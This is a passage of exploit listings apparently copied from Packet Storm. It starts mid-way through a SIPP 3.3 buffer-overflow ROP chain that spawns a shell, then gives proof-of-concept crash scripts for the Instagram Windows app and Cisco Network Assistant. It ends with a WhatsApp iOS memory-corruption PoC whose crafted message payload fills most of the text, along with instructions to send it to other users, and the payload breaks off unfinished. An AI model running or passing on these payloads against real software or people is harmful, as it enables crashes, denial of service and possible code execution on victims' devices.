rop += pack('<I', 0x0811abe4) # @ .data + 4
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '//sh'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x08067b43) # pop ecx ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x0811abe0) # padding without overwrite ebx
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080c861f) # int 0x80

try:
   print("[*] SIPP 3.3 Buffer Overflow by Juan Sacco")
   print("[*] Please wait.. running")
   subprocess.call(["sipp ", rop])
except OSError as e:
   if e.errno == os.errno.ENOENT:
       print "SIPP  not found!"
   else:
    print "Error executing exploit"
   raise

Source:packetstormsecurity.com

Instagram App 41.1788.50991.0 Denial Of Service

August 28, 2018, 9:33 am
$
0
0

Instagram App version 41.1788.50991.0 denial of service proof of concept exploit.


MD5 | d250cf3b65102adc33e62130fafa81c9

Download
# Exploit Title: Instagram App 41.1788.50991.0 - Denial of Service (PoC)
# Exploit Author : Ali Alipour
# Date: 2018-08-25
# Vendor Homepage : https://www.instagram.com/
# Software Link Download : https://www.microsoft.com/en-us/p/instagram/9nblggh5l9xt?ocid=blitz_windowsblog&activetab=pivot%3aoverviewtab
# About : https://blogs.windows.com/windowsexperience/2016/10/13/instagram-app-for-windows-10-expands-to-pc-and-tablets/#SKp37OKfVaj7FRee.97
# Tested on : Windows 10 - 64-bit

# Steps to Reproduce
# Run the python exploit script, it will create a new 
# file with the name "Instagram.txt" just copy the text inside "Instagram.txt"
# and start the Instagram App - In Microsoft Windows 10 . 
# In The New Window Click " Sign Up With Phone Or Email " And Select Email Tab. 
# Now Paste The Content Of "Instagram.txt" Into The Field: " Email Address ". 
# Click "Next" And You Will See a [ Boom !!!! ] - Instagram App - In Microsoft Windows 10 Crash.

#!/usr/bin/python

buffer = "A" * 60000
payload = buffer
try:
    f=open("Instagram.txt",22"w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"



Source:packetstormsecurity.com
Search

Cisco Network Assistant 6.3.3 Denial Of Service

August 28, 2018, 9:34 am
$
0
0

Cisco Network Assistant version 6.3.3 suffers from a denial of service vulnerability.


MD5 | 375bcf577cae1bcc14c321a3df4e319b

Download
# Exploit Title: Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-27
# Vendor Homepage: https://www.cisco.com/
# Software Link : https://software.cisco.com/download/home/286277276/type/280775097/release/6.3.3
# Tested Version: 6.3.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python Cisco_Network_Assistant_6.3.3.py
# 2.- Open Cisco_Network_Assistant_6.3.3.txt and copy content to clipboard
# 3.- Open Cisco Network Assistant
# 4.- Authenticate to Cisco CCO
# 5.- Paste ClipBoard on "Cisco Login"
# 6.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 6900000
f = open ("Cisco_Network_Assistant_6.3.3.txt", "w")
f.write(buffer)
f.close()



Source:packetstormsecurity.com

WhatsApp 2.18.61 Memory Corruption

August 28, 2018, 9:34 am
$
0
0

WhatsApp version 2.18.61 suffers from a memory corruption vulnerability.


MD5 | 4e0f56a67db6bc6666fda14e307078c1

Download
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> at Exploit Pack-
http://www.exploitpack.com
# This vulnerability has been discovered and exploited using
ExploitPack - Framework
#
# Tested on: iPhone 5/6s/X iOS 10 and 11.4.1 ( Latest release of iOS
at the date of writing this )
#
# Description:
# WhatsApp 2.18.61 and prior are affected. The application fails to
properly filter user-supplied UTF-8 chars and cannot process rapid
memory allocs/deallocs in iOS devices
# thus for it becomes prone to a remote memory corruption
vulnerability by using an specially crafted message.
#
# Impact:
# Resource exhaustion attacks exploit a design flaw. An attacker could
exploit this vulnerability to remotely corrupt the memory of the
target and forcing an uhandled exception
# in the context of the application that could potentially result in a
denial-of-service condition and/or remote memory corruption.
#
# Debug:
# B04500954836","name":"WhatsApp"}
# Date/Time:       2018-04-06 18:15:30.608135 +0200
# OS Version:      iPhone OS 11.4.1 (Build 15E302)
# Architecture:    arm64
# Command:         WhatsApp
# ExceptionType: EXC_CRASH
#
# How to use this exploit:
# Send the payload as a message to another Whatsapp user or group,
trough a phone orw hatsapp-web.
#
# WARNING!
# Because this is a especially crafted message, if WhatsApp crashes it
doesn't means that the message it's not stored on the phone you need
to remove it/archive it before open
# the conversation again or it will be triggered back.
#
# Timeline:
# Date and time of release: 27 August 2018
# Reported to Apple: ???
# Reported to Facebook/Whatsapp: ???

import sys
reload(sys)

def whatsapp(filename):
    sys.setdefaultencoding("utf-8")
    payload1 = u'a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) 